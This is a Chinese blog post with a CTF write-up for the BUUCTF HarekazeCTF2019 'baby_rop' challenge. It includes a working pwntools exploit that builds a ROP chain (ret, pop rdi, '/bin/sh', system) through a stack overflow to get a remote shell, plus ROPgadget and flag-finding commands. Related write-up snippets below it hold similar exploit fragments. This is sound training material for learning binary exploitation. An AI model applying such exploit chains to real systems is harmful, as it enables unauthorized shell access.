BUUCTF [HarekazeCTF2019]baby_rop

最新推荐文章于 2024-05-05 22:46:05 发布
最新推荐文章于 2024-05-05 22:46:05 发布
阅读量203 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74020775/article/details/130660041
版权

小白做题垃圾笔记,不建议阅读。

main函数里直接是漏洞 ,第6行存在栈溢出。

不过因为这是64位程序,所以我们需要找一些东西的地址。

system(调用系统函数·)

ret(用来栈对齐)

pop rdi (用来传参)

/bin/sh   (当作system的参数)

对应指令如下:

#ROPgadget --binary <binary_file> --only "pop|ret" | grep "pop rdi"
#ROPgadget --binary bin --only "pop|ret"
#ROPgadget --binary ./level2_x64 --only "ret"

至于system函数:

脚本:

from pwn import *

debug=0
if debug:
    p=process('./babyrop')
    #p=process('',env={'LD_PRELOAD':'./libc.so'})
    context.log_level='debug'
    gdb.attach(p)
else:
    p=remote('node4.buuoj.cn',28460)
    context.log_level='debug'

def ru(x):
    return p.recvuntil(x)

def se(x):
    p.send(x)

system=0x0000000000400490

#ROPgadget --binary ./babyrop   --only "pop|ret" | grep "pop rdi" 

pop_rdi=0x0000000000400683# : pop rdi ; ret
bin_sh=0x0000000000601048
ret_add=0x0000000000400479   #: ret
payload=b'b'*0x10+b'b'*8+p64(ret_add)+p64(pop_rdi)+p64(bin_sh)+p64(system)


ru(b'name? ')
se(payload)

#ru(b'!')
p.interactive()

#ROPgadget --binary <binary_file> --only "pop|ret" | grep "pop rdi"
#ROPgadget --binary bin --only "pop|ret"
#ROPgadget --binary ./level2_x64 --only "ret"

在打通以后先ls

 

等到看到文件后

find  /  -name   flag

cat   路径

cat  /home/babyrop/flag 

一次打不通可以多打几次。

 

y6y6y666
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2589
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
[HarekazeCTF2019]baby_rop2
m0_52231248的博客
11-16 898
[HarekazeCTF2019]baby_rop2 Checksec: Ida: 很容易看到read存在溢出,offest=0x28 程序中没有system函数和sh字段我们要用ret2libc绕过nx保护 程序中存在printf函数我们用它来泄漏libc基址 先找到printf需要填的rdi和rsi Exp: from pwn import * from LibcSearcher import * context.log_level='debug' r=remote("n
buuctf|[HarekazeCTF2019]baby_rop 1
m0_64236521的博客
05-02 961
buuctf|[HarekazeCTF2019]baby_rop 1 分析 下载文件重命名为pwn_15,checksec一下 只开启了NX,64位,用ida看看 这里可以栈溢出,同时在侧面看到了system() shift+F12查看字符串 找到binsh,由于是64位,我们要寄存器传参,ROPgadget下 exp如下 from pwn import* p=remote('node4.buuoj.cn',25977) #p=process("./pwn_15") system_addr=0x
BUU-[HarekazeCTF2019]baby_rop
qq_45771413的博客
04-27 1507
查看保护 IDA scanf没限制输入长度,这里可以溢出v4 寻找system和敏感字符串: 都找到了,看来可以缝合缝合了。 解题 这次还是rop,但是还是查阅了相关资料,比第一次做时理解要深刻点。也会用寻找ret返回的工具: ROPgadget ROP相关概念: ROP就是使用返回指令ret连接代码的一种技术 (同理还可以使用jmp系列指令和call指令,有时候也会对应地成为JOP/COP)。 一个程序中必然会存在函数,而有函数就会有ret指令。 而ret指令的本质是pop eip,即把当前栈顶的内
BUUCTF PWN [HarekazeCTF2019]baby_rop
Rt1Text的博客
05-27 326
1.checksec+运行 64位/NX堆栈不可执行 2.IDA进行中 1.main函数 本题函数倒不是很多 很明显,格式化字符串漏洞 2.system bin/sh 3.offset 总体来看64位寄存器传参 3.EXP from pwn import* p=remote('node4.buuoj.cn',27198) shell=0x601048 system=0x400496 rdi=0x400683 payload=b'a'*(...
BUUCTF pwn [HarekazeCTF2019]baby_rop2
菜的只能随便写写博客
02-17 1679
0x01 文件分析   0x02 运行  和babyrop一样。   0x03 IDA  程序流程和babyrop差不多,但是这个里面没有提供可用的gadget,需要自己完成rop。   0x04 思路  没有默认的gadget,需要自己构建,需要利用栈溢出和printf函数泄露libc版本和libc基址,再构建rop。需要注意的是printf函数需要用到的参数,第一个参数需要为格式化字符...
buuctf pwn [HarekazeCTF2019]baby_rop2
weixin_45441024的博客
12-03 448
buuctf pwn [HarekazeCTF2019]baby_rop2 ret2libc 老样子还是先check一下,发现开启了NX,说明我们不能利用ret2shellcode了,将文件放到IDA里面来分析一下 题目中有%s字符的字样,我们就想到了利用格式化字符串来泄露某个函数的真实地址,来找到libc的版本,最后拼接出一个system("/bin/sh")来获取shell,通过上图我们找到了溢出点在read函数,buf距离栈底的高度为0x20 因为这是一个64位的程序,其参数是通过寄存器来传递的,
HarekazeCTF2019 baby_rop2
pondzhang的专栏
05-07 248
from pwn import * p = process('./babyrop2') libcelf = ELF('./libc-2.23.so') p = process('./babyrop2') p.recvuntil("What's your name? ") pltprintf = 0x00000000004004F0 gotread = 0x0000000000601020 popr...
[HarekazeCTF2019]baby_rop1
m0_64195960的博客
06-30 665
前言:有两个新的知识点,一个是寻找函数地址,一个是当flag不在根目录下的解决办法开启了栈不可执行保护我们看到了system函数,我们通过shift+f12找一下字符串呜呜它给的实在太多了,有system函数,有/bin/sh,有栈溢出下面介绍两种找system函数地址的方式(因为博主之前只会做那种白给后门函数的题,或者gdb找)注意:我们在这里不是嗯翻,一个程序plt装载的位置大概在灰色部分后面一点(具体原因就不展开啦)我们可以通过调上方彩色的部分来定位这个有点烦,但还是讲讲这样就可以直接获得的,比较发现
buuctf [HarekazeCTF2019]baby_rop
carol2358的博客
04-17 401
可以在程序里找到binsh,ctrl+L, 程序本身有system函数 找到rop 修改system参数为/bin/sh,然后跳转到system运行就可以了,最后加一个假的返回地址 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level...
[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop
mcmuyanga的博客
09-01 698
[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop 附件 步骤: 例行检查,64位,开启了NX保护 试运行一下程序,看这个情况,当我们输入太长字符串的时候会报错 64位ida载入,shift+f12查看程序里的字符串,看到了system 和 ‘/bin/sh’ 双击跟进,ctrl+x查看一下哪里调用了字符串,没有找到函数,只找到了地址 shell=0x601048 system=0x400496 找到输入点,没有限制v4读入的数据,可以造成溢出,跟pwn16差不
PWN——Buuoj [HarekazeCTF2019]baby_rop
u014377094的博客
01-21 729
先用IDA64打开,发现scanf看一眼存入数据的位置 熟悉的味道 按一下shift f12 system函数和/bin/sh都给了那就不客气了 困难题我唯唯诺诺,简单题我重拳出击 思路明确,现在还需要pop rdi,ret来传一下参数(str“/bin/sh)到system里 这个时候用到了ROPgadget 里面的babyrop是这道题的文件名,其他题换一下就ok 现在找到了地址,准备工作完成,敲python 有一点需要注意的是,咱们明明找的是400683,搁ida里咋面目
buuctf27 [HarekazeCTF2019]baby_rop2 1
weixin_74861133的博客
11-20 177
只开启了NX保护。
BUUCTF [HarekazeCTF2019]baby_rop2
红叶的博客
10-28 372
IDA Pro 静态调试。依旧可以使用上次的PoC。
HarekazeCTF2019_baby_rop
z1r0的博客
12-04 721
HarekazeCTF2019_baby_rop 查看保护 溢出,有system和bin,rop就行 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25987) else: r = process(file_name) elf = ELF(file
[HarekazeCTF2019]baby_rop
m0sway的博客
03-26 572
[HarekazeCTF2019]baby_rop WriteUp BUU_PWN
[HarekazeCTF2019]baby_rop[BUUCTF]
最新发布
moonlightsunshin的博客
05-05 342
这个时候思路就很清晰了根据64位函数传参的特点构造ROP链就行,32位与64位传参的区别这里就不再赘述,读者可以看上一篇jarvisoj_level2_x64[BUUCTF] ,根据名字可以猜到这道题考的rop同时是64位的程序。用find -name flag查找路径再cat。
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

y6y6y666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值